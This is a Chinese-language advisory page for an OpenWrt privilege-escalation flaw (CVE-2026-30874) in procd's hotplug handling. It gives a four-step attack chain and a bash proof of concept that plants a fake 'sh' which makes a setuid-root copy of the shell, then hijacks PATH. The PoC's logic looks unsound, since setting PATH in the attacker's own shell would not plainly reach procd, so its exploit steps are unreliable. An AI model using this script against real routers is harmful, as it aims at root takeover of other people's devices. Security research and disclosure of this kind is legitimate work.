CVE-2026-30874 CVSS 7.8 高危

CVE-2026-30874 OpenWrt权限提升漏洞

披露日期: 2026-03-19

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-30874

漏洞类型

权限提升

CVSS评分

7.8 高危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

OpenWrt Project

漏洞概述

OpenWrt在24.10.6版本之前存在一处高危权限提升漏洞。该漏洞源于hotplug_call函数在处理环境变量时，错误地使用了strcmp而非strncmp进行字符串比较，导致PATH等敏感环境变量过滤机制失效。本地低权限攻击者可利用此漏洞注入恶意PATH变量，劫持procd调用的热插拔脚本执行流程，进而以root权限执行任意代码，控制系统。

技术细节

该漏洞的核心技术原理在于OpenWrt的procd守护进程中hotplug_call函数的字符串比较逻辑错误。该函数的设计初衷是在执行/etc/hotplug.d/目录下的热插拔脚本之前，清除包括PATH在内的敏感环境变量，以确保执行环境的安全。然而，代码实现中错误地使用了strcmp函数而非strncmp。strcmp会对整个字符串进行匹配，例如它会将实际环境变量字符串“PATH=/usr/bin”与黑名单中的关键字“PATH”进行直接比较，这导致比较操作永远返回不匹配，过滤机制因此彻底失效。利用此漏洞，本地低权限攻击者可以设置包含恶意可执行文件路径的自定义PATH环境变量。当系统发生热插拔事件（如USB插入、网络接口变化）时，procd进程将以root权限调用相应的处理脚本。由于PATH已被劫持，脚本中调用的任何未使用绝对路径的系统命令（如sh、netifd等）都将优先加载并执行攻击者提供的恶意程序，最终导致攻击者获得系统的最高控制权。

攻击链分析

STEP 1

步骤1：获取初始访问

攻击者获得OpenWrt设备的本地低权限访问权限（例如通过非特权用户账户）。

STEP 2

步骤2：环境变量注入

攻击者利用hotplug_call函数的strcmp漏洞，设置恶意的PATH环境变量，指向包含恶意二进制文件的目录。

STEP 3

步骤3：触发热插拔事件

等待或诱导系统触发热插拔事件（如网络接口变动、USB设备插拔），促使procd以root权限执行/etc/hotplug.d/下的脚本。

STEP 4

步骤4：权限提升

由于PATH变量被劫持，root脚本执行时加载了攻击者的恶意程序，从而以root权限执行任意命令，完成提权。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/bin/bash
# PoC for CVE-2026-30874: OpenWrt hotplug PATH injection
# This script simulates how an attacker could exploit the strcmp bug to gain root privileges.

# 1. Create a malicious directory and a payload (e.g., a fake netifd or sh)
ATTACK_DIR="/tmp/exploit_cve_2026_30874"
mkdir -p "$ATTACK_DIR"

# Create a malicious binary that copies a root shell
cat > "$ATTACK_DIR/sh" << 'EOF'
#!/bin/sh
cp /bin/sh /tmp/root_owned_shell
chmod 4755 /tmp/root_owned_shell
echo "PoC executed: Root shell available at /tmp/root_owned_shell"
EOF
chmod +x "$ATTACK_DIR/sh"

# 2. Inject the malicious PATH
# Exploit the strcmp vs strncmp bug: hotplug_call will not filter this.
export PATH="$ATTACK_DIR:$PATH"

echo "[+] Malicious PATH set to: $PATH"
echo "[+] Waiting for a hotplug event (e.g., interface change) to trigger procd..."
echo "[+] When a script in /etc/hotplug.d/ calls 'sh' without a full path, our payload runs."

# In a real scenario, the attacker would wait for the system to trigger an event.
# For demonstration, we can manually trigger a dummy hotplug event if possible,
# or simply wait. The persistence of the PATH depends on the context.
# This PoC demonstrates the environment variable setup required for the exploit.

影响范围

OpenWrt < 24.10.6

防御指南

临时缓解措施

如果无法立即升级，应严格限制本地用户的访问权限，并监控系统进程（特别是procd）的异常行为。关注官方发布的补丁动态并及时应用。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表